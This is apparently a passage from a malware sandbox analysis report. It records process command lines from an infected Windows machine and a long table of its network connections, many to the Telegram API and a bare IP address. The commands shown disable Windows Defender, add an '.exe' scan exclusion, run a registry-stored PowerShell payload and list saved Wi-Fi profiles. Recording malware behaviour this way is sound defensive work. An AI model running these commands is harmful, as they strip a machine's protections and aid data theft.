AGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start lsass
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start lsass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\findstr.exe
findstr All
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add - MpPreference - ExclusionExtension ".exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\findstr.exe
findstr All
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api64.ipify.org | udp |
| US | 104.237.62.213:443 | api64.ipify.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:3232 | tcp | |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:3232 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| US | 66.235.168.242:4449 | tcp | |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:4449 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:3232 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 104.21.44.66:443 | api.mylnikov.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:3232 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 66.235.168.242:3232 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 104.21.44.66:443 | api.mylnikov.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
